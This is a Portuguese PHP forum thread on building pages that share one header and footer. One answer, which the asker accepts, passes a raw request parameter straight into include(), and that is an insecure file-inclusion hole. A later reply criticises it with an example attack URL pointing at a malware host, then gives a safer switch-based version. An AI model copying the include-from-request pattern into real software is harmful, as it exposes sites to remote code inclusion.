Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Alison_Melo

[Resolvido] Como criar um cabeçalho em php para usar sempre o mes

Recommended Posts

Me desculpem se ja existe um tópico assim, porém, eu não sei nem ao menos como procurar isto,

É que eu quero criar um site, em que, tanto o cabeçalho e o rodapé sejam o mesmo sempre, e eu queria criar os conteudos, separados em php, e deixar o cabeçalho e rodapé de forma que fique "travado", e só mude a area do conteudo

Qual código uso para fazer isto ?

Muito obrigado!

Compartilhar este post

Link para o post
Compartilhar em outros sites

Procure por queystrings. Deve ter um zibilhão de tópicos sobre isso :lol:

Compartilhar este post

Link para o post

Procure por queystrings. Deve ter um zibilhão de tópicos sobre isso :lol:

Eu procurei, mas no forum msm, não achei muita coisa, e oque eu achei tinha ave com .htacces, me perdoem se estou falando baboseira, pois sou leigo no assunto,

porém, o site que vi, usava apenas arquivos .php, e quando eu clicava nos menus, só mudava o conteudo,

exemplo:

www.site.com.br

clicando em um botão

www.site.com.br/contato.php

o cabeçalho e o rodapé, se mantem os mesmos,só o conteudo muda.

Valew pela atenção!

Compartilhar este post

Link para o post

bom, é facil:

index.php

<html>
<head>...</head>
<body>
<!-- Header -->
...

<!-- include -->
<?php include($_REQUEST['pagina'] . '.php');
// inclui no meio da pagina principal, a pagina produtos.php
// usasse <a href='?pagina=produtos'>produtos</a>
// pesquise sobre QueryStrings em PHP
// basicamente é isso
?>

<!-- Footer -->
...
</body>
</html>

produtos.php

pagina produtos. conteudo.

Funciona assim:

Você tem uma pagina: index.php (que o servidor vai acessar primeiramente, sempre).

E nessa pagina, conterá todo o código .html necessário, ou seja, a estrutura visual principal do site será nesse arquivo. Nesse mesmo arquivo, você reserva um espaço que sera preenchido dinamicamente. Ou seja, um espaço onde você ira incluir conteúdo aleatório. Querystrings são variáveis que serão utilizadas para identificar as paginas, para controle.

Compartilhar este post

Link para o post

bom, é facil:

index.php

<html>
<head>...</head>
<body>
<!-- Header -->
...

<!-- include -->
<?php include($_REQUEST['pagina'] . '.php');
// inclui no meio da pagina principal, a pagina produtos.php
// usasse <a href='?pagina=produtos'>produtos</a>
// pesquise sobre QueryStrings em PHP
// basicamente é isso
?>

<!-- Footer -->
...
</body>
</html>

produtos.php

pagina produtos. conteudo.

;)

ENTENDI!! haha

Obrigado pela ajuda dos dois, é bem isso que eu precisava !!

Compartilhar este post

Link para o post

O que você encontrou foram URL's Amigáveis (também tem uma pá de tópico sobre elas).

O que você ntalvez não tenha entendido ou percebido é que elas estão intimamente ligadas com as querystrings, pois querystrings + htaccess = uma das formas de ser fazer URL's Amigáveis.

Mas vamos lá...

Cada par chave=valor que você ver na URL é um índice que estará ou deverá estar presente no array superglobal $_GET.

Múltiplos pares estarão unidos por & (ampersand, E-comercial, chame como qusier :P ) e antes do primeiro par haverá umnome de arquivo, com extensão ou não (depende do htaccess) e uma ? (interrogação).

Qualquer URL nesse formato já é uma querystring. Mas o que vai fazê-la trabalhar como uma é o PHP. Ex:

http://www.domain.com/admin.php?section=managemet&group=users

Desculpe pela tara pelo inglês :lol:

Nessa URL, se você fizer, no arquivo admin.php (supondo que ela exista):

print '<pre>'; Print_r( $_GET );

Quando você acessar essa URL você verá na tela:

Array (

[section] => 'management'
   [group] => 'users'
)

Beleza até aí?

Pra voê fazer esse super truque de ilusionismo do Chris Angel (:lol:) você deve fazer duas coisas: verificar se determinado valor que você vai usar existe e condicioná-los a fazer alguma coisa.

Para verificar você usa, em cojunto isset() e empty() e para condicionar, IF/ELSEIF/ELSE ou switch. Existem outras formas, mas essa é a mais básica de todas.

ANTES dessas condições, você inclui oarquivo com o cabeçalho, desde o DOCTYPE até a abertura da tag <body> e DEPOIS dela você inçui o rodapé, que pode ter só o </body> e </html> como também algum HTML extra de "copyright".

Quando alguma condição for satisfeita, você incluiinclui o arquivo que desejar, normalmente com o corpo da página.

E pronto! Um exemplozinho bem mastigado.

$section = ( isset( $_GET['section'] ) && ! empty( $_GET['section'] ) ? $_GET['section'] : NULL );

include 'header.php';

switch( $section ) {

case 'management':
       include 'management.php';
   break;

case 'settings':
       include 'settings.php';
   break;

case 'themes':
       include 'themes.php';
   break;

default:
       include 'dashboard.php';
   break;
}

include 'footer.php';

Criados os arquivos em questão e a URL acessada você verá que caímos no primeiro case. Se você mudar para:

http://www.domain.com/admin.php?section=settings&group=datetime

Verá que caimos na segunda, referente às possíveis configurações do sistema.

Qualquer coisa não definida, cairá no default que seria o nosso Dashboard, ou a Visão Geral do sistema, como num blog.

Para fazer o aninhamento de pares chave=valor, basta repetir a estrutura acima nos arquivos que estiverem sendo incluídos.

Uma consideração apenas. O exemplo que eu dei NÃO foi feito para múltiplos valores. Isso porque eu inclui o cabeçalho e rodapé logo antes da primeira condição.

Se você repetir igualzinho nos arquivos inclúidos, você perceberá que terá dois cabeçalhos e dois rodapés.

Para resolver isso, ou você remove essas linhas do s arquivos internos, ou remove de tudo e adiciona apenas nos arquivos incluídos no default E no arquivo mais interno da estrutura.

Na URÇL de exemplo seriam os arquivos users.php e datetime.php.

Bins estudos :thumbsup:

[EDIT}

Enquanto eu escrevia houveram outras respostas. Tudo bem, fiz um pit stop só pra dizer que a forma que o William postou apesar de funcionar, só aceita um "nível" nas URL's.

Para ter mais tem, também, de repetir como eu citei.

MAS, a forma como ele fez além de ser uma gambiarra, pois na minha opinião $_REQUEST deveria ser exterminado do PHP, é uma tremenda brecha de segurança pois nada impediria um hacker de fazer:

http://www.domain.com/index.php?pagina=http://www.malware.com/malware.exe

Compartilhar este post

Link para o post

[EDIT}

Enquanto eu escrevia houveram outras respostas. Tudo bem, fiz um pit stop só pra dizer que a forma que o William postou apesar de funcionar, só aceita um "nível" nas URL's.

Para ter mais tem, também, de repetir como eu citei.

MAS, a forma como ele fez além de ser uma gambiarra, pois na minha opinião $_REQUEST deveria ser exterminado do PHP, é uma tremenda brecha de segurança pois nada impediria um hacker de fazer:

http://www.domain.com/index.php?pagina=http://www.malware.com/malware.exe

Puxão de Orelha !? kkkkkk :P

Mas então, fui direto assim, por que achei que o usuário parece estar começando com isso e por mais inseguro que seja daquela forma, no minimo, para começar a lidar com inclusões e trabalhar com variáveis em url's, enfim, pra começo se torna mais fácil, mais viável o caminho. Mas com o tempo, aprende! tudo vai da pesquisa.

Abraços

Compartilhar este post

Link para o post

Valew pessoal, vcs todos me ajudaram muito!

Bom fazer parte de um fórum com gente competente e dedicada, e principalmente, com um conhecimento tão elevado!

Parabéns pelo talento, muito sucesso a todos, e obrigado mais uma vez!!!

Compartilhar este post

Link para o post

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.